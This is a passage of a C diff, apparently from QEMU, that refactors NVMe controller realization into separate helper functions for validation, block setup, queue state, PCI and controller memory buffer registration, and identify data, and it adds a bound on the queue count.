+#define NVME_MAX_QS PCI_MSIX_FLAGS_QSIZE
 #define NVME_OP_ABORTED 0xff
 #define NVME_GUEST_ERR(trace, fmt, ...) \
 do { \
@@ -1365,66 +1366,105 @@ static const MemoryRegionOps nvme_cmb_ops = {
 },
 };
 
-static void nvme_realize(PCIDevice *pci_dev, Error **errp)
+static int nvme_check_constraints(NvmeCtrl *n, Error **errp)
 {
-NvmeCtrl *n = NVME(pci_dev);
-NvmeIdCtrl *id = &n->id_ctrl;
-NvmeIdNs *id_ns = &n->namespace.id_ns;
-
-int64_t bs_size;
-uint8_t *pci_conf;
-
-if (!n->params.num_queues) {
-error_setg(errp, "num_queues can't be zero");
-return;
-}
+NvmeParams *params = &n->params;
 
 if (!n->conf.blk) {
-error_setg(errp, "drive property not set");
-return;
+error_setg(errp, "nvme: block backend not configured");
+return 1;
 }
 
-bs_size = blk_getlength(n->conf.blk);
-if (bs_size < 0) {
-error_setg(errp, "could not get backing file size");
-return;
+if (!params->serial) {
+error_setg(errp, "nvme: serial not configured");
+return 1;
 }
 
-if (!n->params.serial) {
-error_setg(errp, "serial property not set");
-return;
+if ((params->num_queues < 1 || params->num_queues > NVME_MAX_QS)) {
+error_setg(errp, "nvme: invalid queue configuration");
+return 1;
 }
+
+return 0;
+}
+
+static int nvme_init_blk(NvmeCtrl *n, Error **errp)
+{
 blkconf_blocksizes(&n->conf);
 if (!blkconf_apply_backend_options(&n->conf, blk_is_read_only(n->conf.blk),
-   false, errp)) {
-return;
+false, errp)) {
+return 1;
 }
 
-pci_conf = pci_dev->config;
-pci_conf[PCI_INTERRUPT_PIN] = 1;
-pci_config_set_prog_interface(pci_dev->config, 0x2);
-pci_config_set_class(pci_dev->config, PCI_CLASS_STORAGE_EXPRESS);
-pcie_endpoint_cap_init(pci_dev, 0x80);
+return 0;
+}
 
+static void nvme_init_state(NvmeCtrl *n)
+{
 n->num_namespaces = 1;
 n->reg_size = pow2ceil(0x1004 + 2 * (n->params.num_queues + 1) * 4);
-n->ns_size = bs_size / (uint64_t)n->num_namespaces;
-
 n->sq = g_new0(NvmeSQueue *, n->params.num_queues);
 n->cq = g_new0(NvmeCQueue *, n->params.num_queues);
+}
 
-memory_region_init_io(&n->iomem, OBJECT(n), &nvme_mmio_ops, n,
-  "nvme", n->reg_size);
+static void nvme_init_cmb(NvmeCtrl *n, PCIDevice *pci_dev)
+{
+NVME_CMBLOC_SET_BIR(n->bar.cmbloc, 2);
+NVME_CMBLOC_SET_OFST(n->bar.cmbloc, 0);
+
+NVME_CMBSZ_SET_SQS(n->bar.cmbsz, 1);
+NVME_CMBSZ_SET_CQS(n->bar.cmbsz, 1);
+NVME_CMBSZ_SET_LISTS(n->bar.cmbsz, 0);
+NVME_CMBSZ_SET_RDS(n->bar.cmbsz, 1);
+NVME_CMBSZ_SET_WDS(n->bar.cmbsz, 1);
+NVME_CMBSZ_SET_SZU(n->bar.cmbsz, 2);
+NVME_CMBSZ_SET_SZ(n->bar.cmbsz, n->params.cmb_size_mb);
+
+n->cmbloc = n->bar.cmbloc;
+n->cmbsz = n->bar.cmbsz;
+
+n->cmbuf = g_malloc0(NVME_CMBSZ_GETSIZE(n->bar.cmbsz));
+memory_region_init_io(&n->ctrl_mem, OBJECT(n), &nvme_cmb_ops, n,
+"nvme-cmb", NVME_CMBSZ_GETSIZE(n->bar.cmbsz));
+pci_register_bar(pci_dev, NVME_CMBLOC_BIR(n->bar.cmbloc),
+PCI_BASE_ADDRESS_SPACE_MEMORY | PCI_BASE_ADDRESS_MEM_TYPE_64 |
+PCI_BASE_ADDRESS_MEM_PREFETCH, &n->ctrl_mem);
+}
+
+static void nvme_init_pci(NvmeCtrl *n, PCIDevice *pci_dev)
+{
+uint8_t *pci_conf = pci_dev->config;
+
+pci_conf[PCI_INTERRUPT_PIN] = 1;
+pci_config_set_prog_interface(pci_conf, 0x2);
+pci_config_set_vendor_id(pci_conf, PCI_VENDOR_ID_INTEL);
+pci_config_set_device_id(pci_conf, 0x5845);
+pci_config_set_class(pci_conf, PCI_CLASS_STORAGE_EXPRESS);
+pcie_endpoint_cap_init(pci_dev, 0x80);
+
+memory_region_init_io(&n->iomem, OBJECT(n), &nvme_mmio_ops, n, "nvme",
+n->reg_size);
 pci_register_bar(pci_dev, 0,
 PCI_BASE_ADDRESS_SPACE_MEMORY | PCI_BASE_ADDRESS_MEM_TYPE_64,
 &n->iomem);
 msix_init_exclusive_bar(pci_dev, n->params.num_queues, 4, NULL);
 
+if (n->params.cmb_size_mb) {
+nvme_init_cmb(n, pci_dev);
+}
+}
+
+static void nvme_init_ctrl(NvmeCtrl *n)
+{
+NvmeIdCtrl *id = &n->id_ctrl;
+NvmeParams *params = &n->params;
+uint8_t *pci_conf = n->parent_obj.config;
+
 id->vid = cpu_to_le16(pci_get_word(pci_conf + PCI_VENDOR_ID));
 id->ssvid = cpu_to_le16(pci_get_word(pci_conf + PCI_SUBSYSTEM_VENDOR_ID));
 strpadcpy((char *)id->mn, sizeof(id->mn), "QEMU NVMe Ctrl", ' ');
 strpadcpy((char *)id->fr, sizeof(id->fr), "1.0", ' ');
-strpadcpy((char *)id->sn, sizeof(id->sn), n->params.serial, ' ');
+strpadcpy((char